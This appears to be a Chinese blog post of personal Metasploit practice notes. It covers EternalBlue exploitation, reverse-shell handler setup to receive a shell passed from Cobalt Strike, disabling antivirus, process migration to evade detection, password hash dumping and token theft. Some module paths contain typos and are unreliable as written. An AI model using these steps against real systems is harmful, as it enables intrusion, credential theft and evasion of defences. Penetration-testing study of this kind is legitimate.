MSF使用练习

环境搭建

安装Google中文输入法 apt-get install fcitx apt-get install fcitx-googlepinyin

msf简介

Metasploit框架(Metasploit Framework,MSF) 默认安装目录 /usr/share/metasploit-framework/ 命令行下输入msfconsole

主要模块 Auxiliary(辅助模块) Exploits(漏洞利用模块)

Payloads(攻击载荷模块) Post(后期渗透模块) Encoders(编码工具模块)

基本命令

?/help 查看帮助信息 ?命令名 查看该命令如何使用 search 查找 use 使用某一工具 back 返回 exit 退出MSF

info模块名 显示一个或多个模块的信息 show options显示所有选项 set 给一个选项赋值 setg 将一个选项赋值到全局变量 unset 取消选项赋值 unsetg 取消一个全局选项的赋值 version 显示MSF和控制台版本

portscan端口扫描模块

设置好参数就运行就可以(nmap也要用熟),使用端口扫描模块时可以扫两次,看看结果是否相同

nmap -sV -O ip地址

msf攻击步骤

攻击步骤 1.扫描目标机系统,寻找可用漏洞 ⒉选择并配置一个漏洞利用模块 3.选择并配置一个攻击载荷模块 4.选择一个编码技术,用来绕过杀毒软件的查杀 5.渗透攻击

discovery/arp模块

用于发现网段内的主机

永恒之蓝

搜索17-010即可找到永恒之蓝攻击模块,设置好参数后直接运行就可以进行攻击

cs给msf传shell

创建监听,还用reverse http即可。然后获取一个shell。 再创建一个外部监听,演示外部监听tcp类型,地址写MSF地址,端口写未被占用的端口。 MSF下use exploit/multi/handler set payload windows/meterpreter/reverse tcp,端口设置成和刚才CS设置的相同端口,IP设置为MSF的IP运行监听模块 在已取得的shell上右键,选择spawn,选择刚创建的外部监听。 切回MSF,发现MSF已经接收到shell。

Meterpreter

Meterpreter中常用的反弹类型 rexerse tcp 基于TCP的反向链接反弹shell,使用起来很稳定,需要设置LHOST reverse_http 基于http方式的反向连接,在网速慢的情况下不稳定。 reverse_https 基于https方式的反向连接,在网速慢的情况下不稳定,https如果反弹没有收到数据,可以将监听端口换成443试试 bind tcp 基于TCP的正向连接shell,不需要设置LHOST

常用命令:sysinfo、ls、run post/windows/gather/checkvm、idletime、getuid、run post/windows/manage/killav(关闭系统杀毒软件)

进程迁移

后渗透攻击第一步需要移动这个shell,把他和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何读写操作。这样做是的渗透更难被检测到。 1.输入ps获取目标机正在运行的进程。 2.输入getpid查看Meterpreter Shell的进程号。 3.输入migrate +要移动到的进程号迁移进程。 4.再次输入getpid查看进程号,确认迁移成功。 5.自动迁移进程命令:run postwindows/manage/migrate ,系统会自动寻找合适的进程然后迁移。

msfvenom模块

https://www.cnblogs.com/bmjoker/p/10051014.html

这个网站有不同系统的木马的命令

msf获取hash

run post/windowslgatherlsmart hashdump

内网信息收集

判断是否为虚拟机使用频率比较高 post/windows/gather/checkvm 开启哪些服务 post/windowslgatherlenum_services 安装了哪些应用post/windows/gatherlenum applications

令牌窃取

use incognito

posted @ 2021-01-06 14:43  KEEP12  阅读(116)  评论(0编辑  收藏  举报